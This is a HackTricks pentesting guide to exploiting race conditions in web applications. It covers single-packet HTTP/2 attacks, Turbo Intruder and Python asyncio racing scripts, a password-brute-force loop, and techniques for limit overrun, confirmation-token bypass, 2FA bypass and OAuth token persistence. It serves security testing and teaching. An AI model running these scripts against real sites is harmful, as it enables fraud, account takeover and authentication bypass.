hacktricks/pentesting-web/race-condition.md

23 KiB

Race Condition


Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Exploiting RC

The main problem of abusing RC's is that you need the requests to be processed in parallel with a very short time difference(usually >1ms). In the following section, different solutions are proposed for making this possible.

Single-packet attack (HTTP/2) / Last-byte sync (HTTP/1.1)

HTTP2 allows to send 2 requests in a single TCP connetion (whereas in HTTP/1.1 they have to be sequential).
The use of a single TCP packet completely eliminates the effect of network jitter, so this clearly has potential for race condition attacks too. However, two requests isn't enough for a reliable race attack thanks to server-side jitter - variations in the application's request-processing time caused by uncontrollable variables like CPU contention.

But, using HTTP/1.1 'last-byte sync' technique it's possible to pre-send the bulk of the data withholding a tiny fragment from each request and then 'complete' 20-30 requests with a single TCP packet.

To pre-send the bulk of each request:

  • If the request has no body, send all the headers, but don't set the END_STREAM flag. Withhold an empty data frame with END_STREAM set.
  • If the request has a body, send the headers and all the body data except the final byte. Withhold a data frame containing the final byte.

Next, prepare to send the final frames:

  • Wait for 100ms to ensure the initial frames have been sent.
  • Ensure TCP_NODELAY is disabled - it's crucial that Nagle's algorithm batches the final frames.
  • Send a ping packet to warm the local connection. If you don't do this, the OS network stack will place the first final-frame in a separate packet.

Finally, send the withheld frames. You should be able to verify that they landed in a single packet using Wireshark.

{% hint style="info" %} Note that It doesn't work for static files on certain servers but as static files aren't relevant to race condition attacks. But static files are irrelevant for RC attacks. {% endhint %}

Using this technique, you can make 20-30 requests arrive at the server simultaneously - regardless of network jitter:

Adapting to the target architecture

It's worth noting that many applications sit behind a front-end server, and these may decide to forward some requests over existing connections to the back-end, and to create fresh connections for others.

As a result, it's important not to attribute inconsistent request timing to application behaviour such as locking mechanisms that only allow a single thread to access a resource at once. Also, front-end request routing is often done on a per-connection basis, so you may be able to smooth request timing by performing server-side connection warming - sending a few inconsequential requests down your connection before performing the attack (this is just sending several request before starting the actual attack)).

Session-based locking mechanisms

Some frameworks attempt to prevent accidental data corruption by using some form of request locking. For example, PHP's native session handler module only processes one request per session at a time.

It's extremely important to spot this kind of behaviour as it can otherwise mask trivially exploitable vulnerabilities. If you notice that all of your requests are being processed sequentially, try sending each of them using a different session token.

Abusing rate or resource limits

If connection warming doesn't make any difference, there are various solutions to this problem.

Using Turbo Intruder, you can introduce a short client-side delay. However, as this involves splitting your actual attack requests across multiple TCP packets, you won't be able to use the single-packet attack technique. As a result, on high-jitter targets, the attack is unlikely to work reliably regardless of what delay you set.

Instead, you may be able to solve this problem by abusing a common security feature.

Web servers often delay the processing of requests if too many are sent too quickly. By sending a large number of dummy requests to intentionally trigger the rate or resource limit, you may be able to cause a suitable server-side delay. This makes the single-packet attack viable even when delayed execution is required.

{% hint style="warning" %} For more information about this technique check the original report in https://portswigger.net/research/smashing-the-state-machine {% endhint %}

Attack Examples

  • Tubo Intruder - HTTP2 single-packet attack (1 endpoint): You can send the request to Turbo intruder (Extensions -> Turbo Intruder -> Send to Turbo Intruder), you can change in the request the value you want to brute force for %s like in csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s and then select the examples/race-single-packer-attack.py from the drop down:

If you are going to send different values, you could modify the code with this one that uses a wordlist from the clipboard:

    passwords = wordlists.clipboard
    for password in passwords:
        engine.queue(target.req, password, gate='race1')

{% hint style="warning" %} If the web doesn't support HTTP2 (only HTTP1.1) use Engine.THREADED or Engine.BURP instead of Engine.BURP2. {% endhint %}

  • Tubo Intruder - HTTP2 single-packet attack (Several endpoints): In case you need to send a request to 1 endpoint and then multiple to other endpoints to trigger the RCE, you can change the race-single-packet-attack.py script with something like:
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )
    
    # Hardcode the second request for the RC
    confirmationReq = '''POST /confirm?token[]= HTTP/2
Host: 0a9c00370490e77e837419c4005900d0.web-security-academy.net
Cookie: phpsessionid=MpDEOYRvaNT1OAm0OtAsmLZ91iDfISLU
Content-Length: 0

'''
    
    # For each attempt (20 in total) send 50 confirmation requests.
    for attempt in range(20):
        currentAttempt = str(attempt)
        username = 'aUser' + currentAttempt
    
        # queue a single registration request
        engine.queue(target.req, username, gate=currentAttempt)
        
        # queue 50 confirmation requests - note that this will probably sent in two separate packets
        for i in range(50):
            engine.queue(confirmationReq, gate=currentAttempt)
        
        # send all the queued requests for this attempt
        engine.openGate(currentAttempt)
  • It's also available in Repeater via the new 'Send group in parallel' option in Burp Suite.
    • For limit-overrun you could just add the same request 50 times in the group.
    • For connection warming, you could add at the beginning of the group some requests to some non static part of the web server.
    • For delaying the process between processing one request and another in a 2 substates steps, you could add extra requests between both requests.
    • For a multi-endpoint RC you could start sending the request that goes to the hidden state and then 50 requests just after it that exploits the hidden state.

Raw BF

Before the previous research these were some payloads used which just tried to send the packets as fast as possible to cause a RC.

  • Repeater: Check the examples from the previous section.
  • Intruder: Send the request to Intruder, set the number of threads to 30 inside the Options menu and, select as payload Null payloads and generate 30.
  • Turbo Intruder
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           pipeline=False
                           )
    a = ['Session=<session_id_1>','Session=<session_id_2>','Session=<session_id_3>']
    for i in range(len(a)):
        engine.queue(target.req,a[i], gate='race1')
    # open TCP connections and send partial requests
    engine.start(timeout=10)
    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)
  • Python - asyncio
import asyncio
import httpx

async def use_code(client):
    resp = await client.post(f'http://victim.com', cookies={"session": "asdasdasd"}, data={"code": "123123123"})
    return resp.text

async def main():
    async with httpx.AsyncClient() as client:
        tasks = []
        for _ in range(20): #20 times
            tasks.append(asyncio.ensure_future(use_code(client)))
        
        # Get responses
        results = await asyncio.gather(*tasks, return_exceptions=True)
        
        # Print results
        for r in results:
            print(r)
        
        # Async2sync sleep
        await asyncio.sleep(0.5)
    print(results)

asyncio.run(main())

RC Methodology

Limit-overrun / TOCTOU

This is the most basic type of race condition where vulnerabilities that appear in places that limit the number of times you can perform an action. Like using the same discount code in a web store several times. A very easy example can be found in this report or in this bug.

There are many variations of this kind of attack, including:

  • Redeeming a gift card multiple times
  • Rating a product multiple times
  • Withdrawing or transferring cash in excess of your account balance
  • Reusing a single CAPTCHA solution
  • Bypassing an anti-brute-force rate limit

Hidden substates

Other most complicated RC will exploit substates in the machine state that could allow an attacker to abuse states he was never meant to have access to but there is a small window for the attacker to access it.

  1. Predict potential hidden & interesting substates

The first step is to identify all the endpoints that either write to it, or read data from it and then use that data for something important. For example, users might be stored in a database table that is modified by registration, profile-edits, password reset initiation, and password reset completion.

We can use three key questions to rule out endpoints that are unlikely to cause collisions. For each object and the associated endpoints, ask:

  • How is the state stored?

Data that's stored in a persistent server-side data structure is ideal for exploitation. Some endpoints store their state entirely client-side, such as password resets that work by emailing a JWT - these can be safely skipped.

Applications will often store some state in the user session. These are often somewhat protected against sub-states - more on that later.

  • Are we editing or appending?

Operations that edit existing data (such as changing an account's primary email address) have ample collision potential, whereas actions that simply append to existing data (such as adding an additional email address) are unlikely to be vulnerable to anything other than limit-overrun attacks.

  • What's the operation keyed on?

Most endpoints operate on a specific record, which is looked up using a 'key', such as a username, password reset token, or filename. For a successful attack, we need two operations that use the same key. For example, picture two plausible password reset implementations:

  1. Probe for clues

At this point it's time to launch some RCs attacks over the potential interesting endpoints to try to find unexpected results compare to the regular ones. Any deviation from the expected response such as a change in one or more responses, or a second-order effect like different email contents or a visible change in your session could be a clue indicating something is wrong.

  1. Prove the concept

The final step is to prove the concept and turn it into a viable attack.

When you send a batch of requests, you may find that an early request pair triggers a vulnerable end-state, but later requests overwrite/invalidate it and the final state is unexploitable. In this scenario, you'll want to eliminate all unnecessary requests - two should be sufficient for exploiting most vulnerabilities. However, dropping to two requests will make the attack more timing-sensitive, so you may need to retry the attack multiple times or automate it.

Time Sensitive Attacks

Sometimes you may not find race conditions, but the techniques for delivering requests with precise timing can still reveal the presence of other vulnerabilities.

One such example is when high-resolution timestamps are used instead of cryptographically secure random strings to generate security tokens.

Consider a password reset token that is only randomized using a timestamp. In this case, it might be possible to trigger two password resets for two different users, which both use the same token. All you need to do is time the requests so that they generate the same timestamp.

{% hint style="warning" %} To confirm for example the previous situation you could just ask for 2 reset password tokens at the same time (using single packet attack) and check if they are the same. {% endhint %}

Check the example in this lab.

Hidden substates case studies

Pay & add an Item

Check this lab to see how to pay in a store and add an extra item you that won't need to pay for it.

Confirm other emails

The idea is to verify an email address and change it to a different one at the same time to find out if the platform verifies the new one changed.

According to this writeup Gitlab was vulnerable to a takeover this way because it might send the email verification token of one email to the other email.

You can also check this lab to learn about this.

Hidden Database states / Confirmation Bypass

If 2 different writes are used to add information inside a database, there is a small portion of time where only the first data has been written inside the database. For example, when creating a user the username and password might be written and then the token to confirm the newly created account is written. This means that for a small time the token to confirm an account is null.

Therefore registering an account and sending several requests with an empty token (token= or token[]= or any other variation) to confirm the account right away could allow to confirm an account where you don't control the email.

Check this lab to check an example.

Bypass 2FA

The following pseudo-code demonstrates how a website could be vulnerable to a race variation of this attack:

session['userid'] = user.userid
if user.mfa_enabled:
    session['enforce_mfa'] = True
    # generate and send MFA code to user
    # redirect browser to MFA code entry form

As you can see, this is in fact a multi-step sequence within the span of a single request. Most importantly, it transitions through a sub-state in which the user temporarily has a valid logged-in session, but MFA isn't yet being enforced. An attacker could potentially exploit this by sending a login request along with a request to a sensitive, authenticated endpoint.

OAuth2 eternal persistence

There are several OAUth providers. Theses services will allow you to create an application and authenticate users that the provider has registered. In order to do so, the client will need to permit your application to access some of their data inside of the OAUth provider.
So, until here just a common login with google/linkdin/github... where you are prompted with a page saying: "Application <InsertCoolName> wants to access you information, do you want to allow it?"

Race Condition in authorization_code

The problem appears when you accept it and automatically sends an authorization_code to the malicious application. Then, this application abuses a Race Condition in the OAUth service provider to generate more that one AT/RT (Authentication Token/Refresh Token) from the authorization_code for your account. Basically, it will abuse the fact that you have accept the application to access your data to create several accounts. Then, if you stop allowing the application to access your data one pair of AT/RT will be deleted, but the other ones will still be valid.

Race Condition in Refresh Token

Once you have obtained a valid RT you could try to abuse it to generate several AT/RT and even if the user cancels the permissions for the malicious application to access his data, several RTs will still be valid.

RC in WebSockets

In WS_RaceCondition_PoC you can find a PoC in Java to send websocket messages in parallel to abuse Race Conditions also in Web Sockets.

References

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥


Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}